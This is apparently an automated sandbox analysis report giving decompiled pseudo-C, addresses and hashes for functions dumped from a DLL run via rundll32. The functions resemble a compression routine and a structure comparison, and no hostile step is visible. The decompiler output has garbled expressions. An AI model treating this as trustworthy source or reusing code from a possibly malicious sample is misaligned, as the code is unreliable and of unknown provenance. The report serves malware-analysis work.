				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8ac9b60f
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x159850f
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x159
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xff4d88c8
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0xfff4d88
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8ac9b60f
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0xfff4d88
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x80000002
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x850f8000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xff4d88c8
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8ac9b60f
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8ac9b612
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xff4d88c8
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x6af0458d
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x458d2374
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8ac9b60f
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xff4d88c8
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8ac9b60f
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0xf981f055
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8ac9b60f
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x2f981
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xff4d88c8
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0xfff4d88
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8ac9b60f
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8ac9b611
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0xfff4d88
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8ac9b60f
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x6af0458d
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xff4d88c8
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0xfff4d88
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8ac9b60f
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x100194d3
0x100194da
0x100194de
0x100194e0
0x100194e2
0x100194e8
0x100199d5
0x100199db
0x100194ee
0x100194fa
0x10019507
0x1001950a
0x10019511
0x10019514
0x10019517
0x1001951a
0x1001951b
0x1001951e
0x10019524
0x10019527
0x1001952c
0x1001953c
0x1001953e
0x100195f4
0x10019783
0x10019783
0x1001978c
0x1001989f
0x1001989f
0x100198a6
0x100198a6
0x100198af
0x100198bc
0x100198c5
0x100198c8
0x100198cd
0x10019915
0x100198cf
0x100198cf
0x100198d2
0x100198d9
0x100198df
0x100198e2
0x100198e5
0x100198e8
0x100198eb
0x100198ee
0x100198f4
0x10019902
0x10019905
0x10019908
0x10019911
0x10019911
0x10019918
0x1001991b
0x10019921
0x10019928
0x1001992e
0x1001997c
0x10019988
0x1001998f
0x10019930
0x10019930
0x10019933
0x1001993c
0x1001993f
0x10019942
0x10019949
0x1001994c
0x1001994f
0x10019952
0x10019955
0x1001995b
0x10019966
0x1001996c
0x10019973
0x10019973
0x00000000
0x1001992e
0x10019792
0x10019792
0x10019799
0x10019799
0x100197a2
0x100197af
0x100197b8
0x100197bb
0x100197c0
0x100197c2
0x100197c5
0x100197cc
0x100197d2
0x100197d5
0x100197d8
0x100197db
0x100197de
0x100197e1
0x100197e7
0x100197f5
0x100197fb
0x100197fe
0x10019801
0x10019801
0x10019804
0x10019806
0x10019809
0x1001980f
0x10019816
0x1001981c
0x10019875
0x10019875
0x10019878
0x10019878
0x1001987e
0x10019886
0x10019893
0x1001981e
0x1001981e
0x10019829
0x1001982c
0x1001982f
0x10019832
0x10019839
0x1001983c
0x1001983f
0x10019842
0x10019845
0x1001984b
0x10019857
0x1001985c
0x10019869
0x10019869
0x00000000
0x1001981c
0x100195fa
0x100195ff
0x10019605
0x10019605
0x1001960d
0x1001960d
0x10019615
0x10019615
0x1001961d
0x1001962a
0x10019633
0x10019638
0x1001967d
0x1001967f
0x1001963a
0x1001963a
0x1001963d
0x10019640
0x10019647
0x1001964a
0x1001964d
0x10019650
0x10019653
0x10019659
0x10019667
0x1001966d
0x10019676
0x10019679
0x10019679
0x10019682
0x10019685
0x1001968b
0x1001968b
0x10019692
0x10019692
0x10019699
0x10019699
0x100196a1
0x100196a1
0x100196a8
0x100196b5
0x100196be
0x100196c1
0x100196c6
0x100196c8
0x100196cb
0x100196d2
0x100196d8
0x100196db
0x100196de
0x100196e1
0x100196e4
0x100196e7
0x100196ed
0x100196fb
0x10019701
0x10019704
0x10019707
0x10019707
0x1001970a
0x1001970c
0x1001970f
0x10019715
0x1001971c
0x10019722
0x1001977b
0x1001977b
0x00000000
0x10019724
0x10019724
0x1001972f
0x10019732
0x10019735
0x10019738
0x1001973f
0x10019742
0x10019745
0x10019748
0x1001974b
0x10019751
0x1001975d
0x10019762
0x1001976f
0x00000000
0x1001976f
0x10019544
0x1001954a
0x1001954d
0x10019550
0x10019550
0x10019553
0x10019553
0x10019559
0x10019559
0x10019561
0x10019566
0x10019573
0x1001957c
0x1001957f
0x10019584
0x100195cc
0x10019586
0x10019586
0x10019589
0x10019590
0x10019596
0x10019599
0x1001959c
0x1001959f
0x100195a2
0x100195a5
0x100195ab
0x100195b9
0x100195bc
0x100195bf
0x100195c8
0x100195c8
0x100195d2
0x100195d8
0x100195db
0x100195e2
0x100195e2
0x10019995
0x10019995
0x10019998
0x1001999a
0x1001999f
0x100199ae
0x100199ba
0x100199bf
0x100199bf
0x100199b0
0x100199b0
0x100199b5
0x100199b5
0x100199b5
0x100199a1
0x100199a1
0x100199a6
0x100199a6
0x100199a6
0x00000000
0x1001999f
0x1001953e
0x10019533
0x10019536
0x100199c4
0x00000000
0x100199c4
0x00000000
0x100199c7
0x100199c7
0x100199cb
0x100199cb
0x100199cb
0x00000000
0x10019514

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: 214d7a17fbbeb721b2fc272fa8e13e03def7007dcfd9fc1c1e1a72706350d461
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: 7AF14C755092518FC709CF19C4948FA7BF1EFA9310B1E82FDD8899B3A6D731A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10003EEA Relevance: .2, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10003EEA(void* __fp0) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr* _t122;
				char _t127;
				char _t151;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t175;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				char* _t186;
				void* _t202;
				void* _t203;
				signed int _t208;
				char _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				char _t214;
				char _t215;
				intOrPtr* _t216;
				void* _t217;

				_t260 = __fp0;
				_t122 = E10009525(0x20);
				_t216 = _t122;
				if(_t216 == 0) {
					return _t122;
				}
				_v12 = 0;
				_v5 = 0;
				_t208 = E1000BF58( &_v5);
				_v16 = _t208;
				if(_t208 != 0) {
					_t222 = _v5 - 5;
					if(_v5 == 5) {
						_t8 = _t216 + 0xc; // 0xc
						_t9 = _t216 + 8; // 0x8
						_t10 = _t216 + 4; // 0x4
						E10003C58(_t208, _v12, __fp0, _t216, _t10, _t9, _t8);
						_t217 = _t217 + 0x10;
					}
				}
				E1000953B( &_v16, _v12);
				_v12 = 0;
				_t127 = E1000198C(0x187);
				_push(0x187);
				_v16 = _t127;
				_t175 =  *0x10020d88; // 0x4a5fc98
				_t16 = _t175 + 0x224; // 0x10000000
				_t209 = E10010796( *_t16, _t127, _t222, _t260,  &_v12);
				_v24 = _t209;
				E1000A27E( &_v16);
				if(_t209 != 0) {
					_t151 = E1000198C(0x154);
					_push(0x154);
					_v16 = _t151;
					_t214 = E10010133(_v12, _t151);
					_t186 =  &_v16;
					_v20 = _t214;
					E1000A27E(_t186);
					if(_t214 != 0) {
						_push(_t186);
						_t215 = E10010133( *((intOrPtr*)(_t214 + 0x428)), 0);
						_v16 = _t215;
						if(_t215 != 0) {
							_t27 = _t216 + 0x1c; // 0x1c
							_t28 = _t216 + 0x18; // 0x18
							_t29 = _t216 + 0x14; // 0x14
							_t31 = _t216 + 0x10; // 0x10
							E10003C58( *((intOrPtr*)(_t215 + 0x424)),  *((intOrPtr*)(_t215 + 0x428)), _t260, _t31, _t29, _t28, _t27);
							E100104E3( &_v16);
						}
						E100104E3( &_v20);
					}
					E1000953B( &_v24, _v12);
				}
				if( *((intOrPtr*)(_t216 + 4)) <= 0) {
					L29:
					if( *((intOrPtr*)(_t216 + 0xc)) <= 0) {
						L48:
						return _t216;
					}
					_t165 = 0;
					_t202 = 0;
					_v12 = 0;
					do {
						if( *((intOrPtr*)(_t216 + 0x10)) == 0) {
							L39:
							if( *((intOrPtr*)(_t216 + 0x18)) == 0) {
								goto L47;
							}
							_t211 = 0;
							if( *((intOrPtr*)(_t216 + 0x1c)) <= 0) {
								goto L47;
							}
							_t178 = 0;
							do {
								_t166 =  *((intOrPtr*)(_t216 + 8));
								if( *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) ==  *((intOrPtr*)(_t202 + _t166 + 4)) &&  *((intOrPtr*)(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 8)) ==  *((intOrPtr*)(_t202 + _t166 + 8))) {
									 *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) =  *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) & 0x00000000;
								}
								_t211 = _t211 + 1;
								_t178 = _t178 + 0x24;
							} while (_t211 <  *((intOrPtr*)(_t216 + 0x1c)));
							_t165 = _v12;
							goto L47;
						}
						_t210 = 0;
						if( *((intOrPtr*)(_t216 + 0x14)) <= 0) {
							goto L39;
						}
						_t179 = 0;
						do {
							_t167 =  *((intOrPtr*)(_t216 + 8));
							if( *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) ==  *((intOrPtr*)(_t202 + _t167 + 4)) &&  *((intOrPtr*)(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 8)) ==  *((intOrPtr*)(_t202 + _t167 + 8))) {
								 *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) =  *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) & 0x00000000;
							}
							_t210 = _t210 + 1;
							_t179 = _t179 + 0x24;
						} while (_t210 <  *((intOrPtr*)(_t216 + 0x14)));
						_t165 = _v12;
						goto L39;
						L47:
						_t165 = _t165 + 1;
						_t202 = _t202 + 0x24;
						_v12 = _t165;
					} while (_t165 <  *((intOrPtr*)(_t216 + 0xc)));
					goto L48;
				} else {
					_t168 = 0;
					_t203 = 0;
					_v12 = 0;
					do {
						if( *((intOrPtr*)(_t216 + 0x10)) == 0) {
							L20:
							if( *((intOrPtr*)(_t216 + 0x18)) == 0) {
								goto L28;
							}
							_t213 = 0;
							if( *((intOrPtr*)(_t216 + 0x1c)) <= 0) {
								goto L28;
							}
							_t180 = 0;
							do {
								_t169 =  *_t216;
								if( *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) ==  *((intOrPtr*)(_t203 + _t169 + 4)) &&  *((intOrPtr*)(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 8)) ==  *((intOrPtr*)(_t203 + _t169 + 8))) {
									 *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) =  *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) & 0x00000000;
								}
								_t213 = _t213 + 1;
								_t180 = _t180 + 0x24;
							} while (_t213 <  *((intOrPtr*)(_t216 + 0x1c)));
							_t168 = _v12;
							goto L28;
						}
						_t212 = 0;
						if( *((intOrPtr*)(_t216 + 0x14)) <= 0) {
							goto L20;
						}
						_t181 = 0;
						do {
							_t170 =  *_t216;
							if( *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) ==  *((intOrPtr*)(_t203 + _t170 + 4)) &&  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 8)) ==  *((intOrPtr*)(_t203 + _t170 + 8))) {
								 *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) =  *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) & 0x00000000;
							}
							_t212 = _t212 + 1;
							_t181 = _t181 + 0x24;
						} while (_t212 <  *((intOrPtr*)(_t216 + 0x14)));
						_t168 = _v12;
						goto L20;
						L28:
						_t168 = _t168 + 1;
						_t203 = _t203 + 0x24;
						_v12 = _t168;
					} while (_t168 <  *((intOrPtr*)(_t216 + 4)));
					goto L29;
				}
			}

0x10003eea
0x10003ef5
0x10003efa
0x10003eff
0x10004168
0x10004168
0x10003f0e
0x10003f11
0x10003f19
0x10003f1b
0x10003f21
0x10003f23
0x10003f27
0x10003f2c
0x10003f30
0x10003f36
0x10003f3b
0x10003f40
0x10003f40
0x10003f27
0x10003f4a
0x10003f54
0x10003f57
0x10003f5c
0x10003f60
0x10003f64
0x10003f6c
0x10003f7d
0x10003f7f
0x10003f82
0x10003f89
0x10003f94
0x10003f9c
0x10003fa0
0x10003faa
0x10003fac
0x10003faf
0x10003fb2
0x10003fb9
0x10003fc1
0x10003fce
0x10003fd0
0x10003fd7
0x10003fdf
0x10003fe3
0x10003fe7
0x10003ff1
0x10003ff5
0x10004000
0x10004000
0x10004008
0x10004008
0x10004014
0x1000401a
0x1000401e
0x100040bd
0x100040c1
0x10004162
0x00000000
0x10004162
0x100040c7
0x100040c9
0x100040cb
0x100040ce
0x100040d2
0x10004110
0x10004114
0x00000000
0x00000000
0x10004116
0x1000411b
0x00000000
0x00000000
0x1000411d
0x1000411f
0x10004122
0x1000412d
0x10004141
0x10004141
0x10004146
0x10004147
0x1000414a
0x1000414f
0x00000000
0x1000414f
0x100040d4
0x100040d9
0x00000000
0x00000000
0x100040db
0x100040dd
0x100040e0
0x100040eb
0x100040ff
0x100040ff
0x10004104
0x10004105
0x10004108
0x1000410d
0x00000000
0x10004152
0x10004152
0x10004153
0x10004156
0x10004159
0x00000000
0x10004024
0x10004024
0x10004026
0x10004028
0x1000402b
0x1000402f
0x1000406c
0x10004070
0x00000000
0x00000000
0x10004072
0x10004077
0x00000000
0x00000000
0x10004079
0x1000407b
0x1000407e
0x10004088
0x1000409c
0x1000409c
0x100040a1
0x100040a2
0x100040a5
0x100040aa
0x00000000
0x100040aa
0x10004031
0x10004036
0x00000000
0x00000000
0x10004038
0x1000403a
0x1000403d
0x10004047
0x1000405b
0x1000405b
0x10004060
0x10004061
0x10004064
0x10004069
0x00000000
0x100040ad
0x100040ad
0x100040ae
0x100040b1
0x100040b4
0x00000000
0x1000402b

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d302b8bed4a6726586d7796b05faaa06bc7d6ca5ee3a3c6dfd505f8b3c281936
Instruction ID: cf6ca6b42b56d04065e953f17323c7ec346a95c519199b254ba4ccf5b6d1ff2d
Opcode Fuzzy Hash: d302b8bed4a6726586d7796b05faaa06bc7d6ca5ee3a3c6dfd505f8b3c281936
Instruction Fuzzy Hash: ED91CFB5A007019BD721CF54C4C0AAAB3F1FF84388F12855DE59657A4ADB30F9C6CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100175E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03508ef7a461b0c526fa3b6c724e9bbf49bec6aab501889d486f94ce8d0fe274
Instruction ID: d44f7d24b1c51bb840209d1562cceece2dd248818f645804ceb860721f1f5ec4
Opcode Fuzzy Hash: 03508ef7a461b0c526fa3b6c724e9bbf49bec6aab501889d486f94ce8d0fe274
Instruction Fuzzy Hash: C87185316205794FE704CF2ADCD143637A1F38E391386C519EA45CB395C638E566DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 10013BFA Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b179ebe0a10ae8f9bfd0736ee6230cb3998ab5049f657adb26191df387806924
Instruction ID: fad8c7b219dbfeeb7d3fd678287538bd172af9ecf68de129d89f71a81b13e65a
Opcode Fuzzy Hash: b179ebe0a10ae8f9bfd0736ee6230cb3998ab5049f657adb26191df387806924
Instruction Fuzzy Hash: D65168B3B041B00BDF68CE3E8C642757ED25AC505270EC2B6E9A9CF24AE878C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 100011EB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

